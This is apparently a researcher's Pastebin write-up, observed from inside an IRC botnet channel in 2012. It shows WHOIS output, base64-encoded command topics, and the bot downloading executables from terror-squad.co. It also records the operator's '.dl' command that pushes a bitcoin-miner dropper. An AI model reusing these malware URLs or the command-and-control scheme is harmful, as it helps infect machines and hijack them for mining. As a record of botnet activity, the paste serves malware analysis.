Guest User

Untitled

a guest
Apr 24th, 2012
97
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. * Topic for #BV1 is: d3F6Q29zTyt3Nm5EcmNPb3dxekRwTU80dzdqRHZNSzJ3cVBDbzhPN3c3dkR1OEtpdzdqRHFjTyt3NzdEbzhPK3dxSER2OE85dzduRHJjT293cUxEcjhPandxUER1TU9qdzd6RHBjT3Z3cUxEdU1PMHc3akRzQT09fDk5ODYzMTQw
  2. * Topic for #BV1 set by BV1 at Thu Apr 19 06:40:09 2012
  3. * [BorBot] (BorBot@HTTP-AC028863.lsanca.fios.verizon.net): BorBot :BorBot
  4. * [BorBot] @#BV1
  5. * [BorBot] HTTP.1.1 :HTTP 1.1
  6. * [BorBot] is using a Secure Connection
  7. * [BorBot] idle 11:49:41, signon: Tue Apr 24 10:05:08
  8. * [BorBot] End of WHOIS list.
  9. * [BV1] (glmbrs@BV1): ...
  10. * [BV1] ~#BV1 ~#US
  11. * [BV1] HTTP.1.1 :HTTP 1.1
  12. * [BV1] is a Network Administrator
  13. * [BV1] is available for help.
  14. * [BV1] is using a Secure Connection
  15. * [BV1] idle 00:18:28, signon: Tue Apr 24 00:14:38
  16. * [BV1] End of WHOIS list.
  17.  
  18.  
  19. Topic for #us is: d3F6Q29zT213cXpDcjhPbHc2TER2OE80dzYzRG9NT2d3Ny9Ec0E9PXw5OTg2MzE0MA==
  20.  
  21. * Topic for #us set by Bv1 at Thu Mar 29 04:15:44 2012
  22.  
  23. we.be.thu.gs redirected to local server, and topics placed on correct channels.
  24. On join of #BV1, bot visited http://terror-squad.co/topic.txt
  25. Further encrypted topic in file: d3F6Q29zTzV3N3pDck1Pa3c3akR1TU84d3JiQ284S2p3N3ZEdThPN3dxTER1TU9wdzc3RHZzT2p3NzdDb2NPL3c3M0R1Y090dzZqQ29zT3Z3NlBDbzhPcXc2WERvTU9wd3I3Q29zT3B3N1REcWNLc3dyN0N0Y09xd3JuQ3VzSzF3NjNEcU1LOHdyN0N1OE91d3JUQ3Y4Syt3NnJEcjhPdnc2L0N2Y0svd3I3RHFjT3B3cnJDdXNPdHc2N0N1c0s3dzY3RHFNT3d3cXpDb3NPNXc3L0Ryc0tzdzZQRG9zT3d3cXpDb3NPL3c2UER2c080dzdEQ3JNS2l3NnJEdU1POHc3QT18OTk4NjMxNDA=
  26.  
  27. Bot then downloaded http://terror-squad.co/file2.exe, and joined #US, which was the country code received from the api.
  28.  
  29. <n{US|XP-32a}kjibmbk> Attempting to perform commands from url: http://www.terror-squad.co/topic.txt.
  30. <n{US|XP-32a}kjibmbk> Bot file is already up to date: 29F569AD027B832FCCC132EE66AB67BD == 29F569AD027B832FCCC132EE66AB67BD
  31.  
  32. New action, as I write this up.
  33. <BV1> .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
  34. That's a bot that attempts to download a bitcoin miner.
  35. http://malwr.com/analysis/c38456aa1b1f93fa9da88cb3653a6fd5/
  36. From http://api.cld.me/FoX8/download/bitcoin-miner.exe
  37. Too bad it's not there anymore.
RAW Paste Data